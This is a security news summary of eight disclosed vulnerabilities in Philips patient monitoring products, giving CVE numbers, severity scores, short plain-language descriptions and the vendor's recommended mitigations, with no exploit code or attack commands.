There were 8 vulnerabilities with low to moderate severity found in Philips patient monitoring equipment. Attackers could exploit the vulnerabilities resulting in data disclosure, denial of service, disrupted monitoring, and an escape from the limited setting with restricted privileges.
The following Philips patient monitoring devices were affected by the vulnerabilities:
- Version A.01 of PerformanceBridge Focal Point
- Versions N and earlier versions of IntelliVue X3 and X2
- Versions B.02, C.02, C.03 of Patient Information Center iX (PICiX)
- IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and earlier versions
The 8 Vulnerabilities Identified
CVE-2020-16212 with a CVSS base score of 6.8/10; rated as Moderate Severity. An unauthorized person could access a resource that is exposed to a wrong control sphere and allow him/her to escape the limited environment with restricted privileges. The attacker needs physical access to an unsecured device to exploit the vulnerability.
CVE-2020-16214 with a CVSS base score of 4.2/10; rated as Moderate Severity. User-provided data is stored in a CSV file, however, because special elements are not properly neutralized, they may be viewed as a command upon the opening of the CSV file using a spreadsheet software program.
CVE-2020-16216 with a CVSS base score of 6.5/10; rated as Moderate Severity. The device fails to validate or improperly validates input or information to make certain it has the required properties to permit its safe use. When exploited, a denial of service may occur via a system restart.
CVE-2020-16218 with a CVSS base score of 3.5/10; rated as Low Severity. The product improperly neutralizes user-controlled input prior to placing it in output and then uses it as a webpage that other users could access. An attacker could exploit this flaw to get read-only access to patient information.
CVE-2020-16220 with a CVSS base score of 3.5/10; rated as Low Severity. The product doesn’t validate or inappropriately validates the input data to comply with the syntax. An attacker could exploit this vulnerability and cause the system to crash.
CVE-2020-16222 with a CVSS base score of 5.0/10; rated as Moderate Severity. When persons assert to have a certain identity, there is inadequate authentication to verify that person’s identity, potentially permitting unauthorized data access.
CVE-2020-16224 with a CVSS base score of 6.5/10; rated as Moderate Severity. Whenever the software program parses a formatted structure or message, it can’t cope or inappropriately handles a length field that’s not consistent with the exact length of the related data. Such a problem could result in restarting the surveillance station that interrupts monitoring.
CVE-2020-16228 with a CVSS base score of 6.0/10; rated as Moderate Severity. The software erroneously checks a certificate’s revocation status then potentially allows the use of a compromised certificate.
ERNW Enno and Rey Netzwerke GmbH, security researchers at ERNW Research GmbH, discovered the vulnerabilities and reported them to Philips. Philips sent a report about the vulnerabilities to CISA and other federal agencies following the company’s coordinated vulnerability disclosure policy.
Philips received no reported cases of exploitation of the vulnerabilities in the wild and will issue updates beginning in 2020; nonetheless, for the time being, Philips advises users to do the following mitigations so that attackers will have a harder time to exploit the vulnerabilities:
- Physically or logically separate the vulnerable devices from the local area network (LAN) of the hospital.
- Use access control lists that limit access to the patient monitoring network just for required ports and IP addresses.
- Restrict exposure by not running the SCEP service if not actively used to register new devices.
- Key in a unique password made of 8-12 unknown and randomized digits when registering new devices utilizing SCEP
- Keep the devices secure to block unauthorized persons’ login attempts and make sure to put servers in secured data centers.
- Limit access to patient monitors located at the nurses’ stations
- Do not allow remote access to PIC iX servers when not needed; if remote access is required, only allow remote access when needed
- Follow the rule of least privilege and just permit trusted users to access bedside monitors.
- Users must get in touch with Philips service support teams in their locality or region for more information on upgrading their vulnerable patient monitoring devices and implementing mitigation measures.